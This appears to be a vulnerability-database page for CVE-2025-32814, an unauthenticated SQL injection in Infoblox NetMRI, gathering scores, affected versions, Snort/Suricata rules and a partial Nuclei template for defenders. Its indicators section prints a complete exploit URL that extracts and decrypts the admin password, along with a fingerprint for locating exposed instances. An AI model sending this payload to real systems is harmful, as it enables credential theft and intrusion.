CVE-2025-32814
published 2025-05-22CVE-2025-32814: An issue was discovered in Infoblox NETMRI before 7.6.1. Unauthenticated SQL Injection can occur.
PriorityP191critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
36.41%
98.3th percentile
An issue was discovered in Infoblox NETMRI before 7.6.1. Unauthenticated SQL Injection can occur.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| infoblox | netmri | < 7.6.1 | 7.6.1 |
Detection & IOCsextracted from sources · hover to see the quote
url/netmri/config/userAdmin/login.tdf?skipjackUsername=admin%22+AND+updatexml(rand(),concat(CHAR(126),NetmriDecrypt((select%20PasswordSecure%20from%20skipjack.ACLUser%20where%20UserName=%22admin%22),%22password%22,1),CHAR(126)),null)--%22&skipjackPassword=anything&weakPassword=true&eulaAccepted=Accept&mode=DO-LOGIN↗
path/netmri/config/userAdmin/login.tdf
otherfofa-query: icon_hash="-319724102"
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Infoblox NetMRI login.tdf skipjackUsername Parameter SQL Injection Attempt - Credential Theft (CVE-2025-32814)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/netmri/config/userAdmin/login.tdf|3f|"; fast_pattern; startswith; content:"skipjackUsername|3d|"; content:"netmridecrypt"; nocase; distance:0; reference:url,rhinosecuritylabs.com/research/infoblox-multiple-cves/; reference:cve,2025-32814; classtype:attempted-admin; sid:2062742; rev:1; metadata:affected_product Infoblox, attack_target Networking_Equipment, tls_state TLSDecrypt, created_at 2025_06_04, cve CVE_2025_32814, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, updated_at 2025_06_04, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
- →Exploit requests use HTTP GET to /netmri/config/userAdmin/login.tdf with the skipjackUsername parameter containing error-based SQL injection via updatexml() and the NetmriDecrypt() function to extract encrypted credentials from the skipjack.ACLUser table.
- →Successful exploitation produces an XPATH syntax error response in the HTTP body containing the extracted credential value between tilde (~) delimiters, matchable with regex: XPATH syntax error: '~(.*?)~'
- →Detection should look for the string 'netmridecrypt' (case-insensitive) in the URI query string following the skipjackUsername parameter, as this is the proprietary decryption function abused in the attack payload.
- →The Snort/ET rule (sid:2062742) targets HTTP GET requests where the URI starts with /netmri/config/userAdmin/login.tdf? and contains both skipjackUsername= and netmridecrypt (case-insensitive). TLS decryption (tls_state TLSDecrypt) is required for encrypted traffic inspection.
- →The attack is unauthenticated (PR:N) and network-reachable (AV:N), so any inbound GET to the login.tdf endpoint with SQL metacharacters in skipjackUsername from an unauthenticated session is suspicious.
- ·The Snort rule (sid:2062742) requires TLS decryption to be effective against HTTPS-protected NetMRI deployments, as the attack payload travels in the URI query string.
- ·The Nuclei template targets Infoblox NetMRI versions before 7.6.1; the FOFA fingerprint icon_hash=-319724102 can be used to identify exposed instances for proactive scanning.
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-gfm6-h4jq-qp9r: An issue was discovered in Infoblox NETMRI before 7
ghsa_unreviewed·2025-05-22
CVE-2025-32814 [CRITICAL] CWE-89 GHSA-gfm6-h4jq-qp9r: An issue was discovered in Infoblox NETMRI before 7
An issue was discovered in Infoblox NETMRI before 7.6.1. Unauthenticated SQL Injection can occur.
VulnCheck
infoblox netmri Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2025·CVSS 9.8
CVE-2025-32814 [CRITICAL] infoblox netmri Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
infoblox netmri Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
An issue was discovered in Infoblox NETMRI before 7.6.1. Unauthenticated SQL Injection can occur.
Affected: infoblox netmri
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://app.crowdsec.net/cti/cve-explorer/CVE-2025-32814; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2026-03-14&host_type=src&vulnerability=cve-2025-32814; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2026-03-15&host_type=src&vulnerability=cve-2025-32814; https://dashboard.shadowserver.org/statistics/honeypot/vulnerabili
Suricata
ET WEB_SPECIFIC_APPS Infoblox NetMRI ViewerFileServlet fileName Parameter Authentication Arbitrary File Read (CVE-2024-54188)
suricata·2025-06-04·CVSS 5.3
CVE-2025-32814 [MEDIUM] ET WEB_SPECIFIC_APPS Infoblox NetMRI ViewerFileServlet fileName Parameter Authentication Arbitrary File Read (CVE-2024-54188)
ET WEB_SPECIFIC_APPS Infoblox NetMRI ViewerFileServlet fileName Parameter Authentication Arbitrary File Read (CVE-2024-54188)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Infoblox NetMRI ViewerFileServlet fileName Parameter Authentication Arbitrary File Read (CVE-2024-54188)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/visual/ViewerFileServlet|3f|"; fast_pattern; startswith; content:"filename|3d 2f|"; reference:url,rhinosecuritylabs.com/research/infoblox-multiple-cves/; reference:cve,2025-32814; reference:cve,2024-54188; classtype:attempted-admin; sid:2062744; rev:1; metadata:affected_product Infoblox, attack_target Networking_Equipment, tls_state TLSDecrypt, created_at 2025_06_04, cve CVE_2024_54188, deployment Perimeter, deploymen
Suricata
ET WEB_SPECIFIC_APPS Infoblox NetMRI login.tdf skipjackUsername Parameter SQL Injection Attempt - Credential Theft (CVE-2025-32814)
suricata·2025-06-04·CVSS 9.8
CVE-2025-32814 [CRITICAL] ET WEB_SPECIFIC_APPS Infoblox NetMRI login.tdf skipjackUsername Parameter SQL Injection Attempt - Credential Theft (CVE-2025-32814)
ET WEB_SPECIFIC_APPS Infoblox NetMRI login.tdf skipjackUsername Parameter SQL Injection Attempt - Credential Theft (CVE-2025-32814)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Infoblox NetMRI login.tdf skipjackUsername Parameter SQL Injection Attempt - Credential Theft (CVE-2025-32814)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/netmri/config/userAdmin/login.tdf|3f|"; fast_pattern; startswith; content:"skipjackUsername|3d|"; content:"netmridecrypt"; nocase; distance:0; reference:url,rhinosecuritylabs.com/research/infoblox-multiple-cves/; reference:cve,2025-32814; classtype:attempted-admin; sid:2062742; rev:1; metadata:affected_product Infoblox, attack_target Networking_Equipment, tls_state TLSDecrypt, created_at 2025_06_04, cve CV
Nuclei
NetMRI Unauthenticated SQL Injection via skipjackUsername
nuclei·CVSS 9.8
CVE-2025-32814 [CRITICAL] NetMRI Unauthenticated SQL Injection via skipjackUsername
NetMRI Unauthenticated SQL Injection via skipjackUsername
An issue was discovered in Infoblox NETMRI before 7.6.1. Unauthenticated SQL Injection can occur.
Template:
id: CVE-2025-32814
info:
name: NetMRI Unauthenticated SQL Injection via skipjackUsername
author: iamnoooob,pdresearch
severity: critical
description: |
An issue was discovered in Infoblox NETMRI before 7.6.1. Unauthenticated SQL Injection can occur.
impact: |
Unauthenticated attackers can extract sensitive data including encrypted passwords through SQL injection in the skipjackUsername parameter, potentially leading to complete system compromise.
remediation: |
Upgrade to Infoblox NetMRI version 7.6.1 or later that properly sanitizes SQL input parameters.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-32814
- https
No writeups or analysis indexed.
2025-05-22
Published
Exploited in the wild